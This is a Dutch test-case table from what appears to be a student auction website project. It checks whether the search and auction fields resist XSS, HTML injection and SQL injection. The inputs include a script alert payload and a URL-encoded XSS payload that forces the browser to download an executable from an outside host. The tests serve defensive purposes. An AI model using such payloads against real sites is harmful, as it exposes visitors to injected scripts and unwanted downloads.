Test cases – Testen van XSS-aanvallen, SQL-injecties en HTML-injectie

|  |  |  |  |
| --- | --- | --- | --- |
| Test | Input | Verwacht resultaat | Werkelijk resultaat |
| XSS-aanval testen doormiddel van GET | <http://iproject15.icasites.nl/zoeken.php?zoeken=%27%3E>  <script>alert(1)</script> | Er moet geen javascript alert komen met het bericht ‘1’ | Er moet geen javascript alert komen met het bericht ‘1’ |
| XSS-aanval testen doormiddel van POST | [%27%3E%3Cscript%3Evar%20link%20](http://localhost/Website%20EenmaalAndermaal/bootstrap-4.3.1-dist/zoeken.php?zoeken=%27%3E%3Cscript%3Evar%20link%20)=  %20document.createElement(%27a%27);link.href%20=%20%27  <http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe%27>;  link.download%20=%20%27%27;document.body.appendChild(link);link.click();%3C/script%3E | Bij het openen van een veiling, moet er geen javascript worden uitgevoerd | Bij het openen van een veiling, wordter geen javascript worden uitgevoerd |
| Testen van HTML-injectie | <h2>Testtekst</h2> bij beschrijving veiling | De HTML-tags moeten negeert worden | HTML-tags worden negeert |
| Testen van SQL-injectie | SELECT \* FROM Gebruiker bij de beschrijving van een veiling | De SQL code wordt genegeerd | De SQL code wordt genegeerd |